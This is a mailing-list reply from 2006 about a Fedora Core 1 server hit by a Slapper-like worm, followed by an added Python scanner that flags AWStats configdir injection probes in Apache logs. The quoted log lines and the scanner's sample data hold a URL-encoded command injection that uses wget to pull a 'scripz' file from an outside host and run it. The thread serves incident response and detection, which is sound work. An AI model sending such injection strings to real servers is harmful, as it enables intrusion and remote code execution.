Hi Mike,

> > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip
> >z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1"
> > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)"
> >
> > These "scripz" files end up going into /tmp, being compiled with
> > gcc, renamed to "httpd" and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to
> > fix/block slapper from an FC1 machine?
> >
> > Michael.
> >
>
> Are you sure it's using an SSL exploit?
>
> http://www.lurhq.com/slapperv2.html
>
> Regards, Mike Klinke

No, I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one.

I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed.

Michael.

--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
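
As an added example (not written by either poster), the following Python scans Apache combined-format access logs for the awstats.pl `configdir=` requests quoted in the thread, decodes the payload, and separates rejected probes (4xx, like the 403/404 lines above) from requests the server answered. The sample lines are constructed with documentation-range addresses, and the verdict labels are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Shell metacharacters that have no place in a configuration directory name.
SHELL_META = re.compile(r'[|;`&$<>]')

def configdir_value(target):
    """Return the decoded configdir= value of an awstats.pl request, else None."""
    path, _, query = target.partition('?')
    if not path.lower().endswith('/awstats.pl'):
        return None
    # Split on '&' only: the probe in the thread uses raw ';' inside the value,
    # so a parser that also treats ';' as a separator would truncate it.
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if name == 'configdir':
            return unquote(value)
    return None

def scan(lines):
    """Return one finding per awstats configdir request carrying shell syntax."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        value = configdir_value(m['target']) if m else None
        if value is None or not SHELL_META.search(value):
            continue
        status = int(m['status'])
        # 4xx: rejected or script absent. Anything else: the server answered,
        # so check /tmp and the process list on that host (labels are assumed).
        verdict = 'rejected' if 400 <= status < 500 else 'investigate'
        findings.append({'host': m['host'], 'time': m['ts'], 'status': status,
                         'decoded': value, 'verdict': verdict})
    return findings

# Constructed sample lines (documentation-range addresses), modelled on the thread.
SAMPLE = [
    '192.0.2.10 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.11 - - [23/Jan/2006:08:35:10 +1100] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20YYY%7C HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.12 - - [23/Jan/2006:08:36:00 +1100] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE):
        print(f['verdict'], f['host'], f['status'], repr(f['decoded']))
```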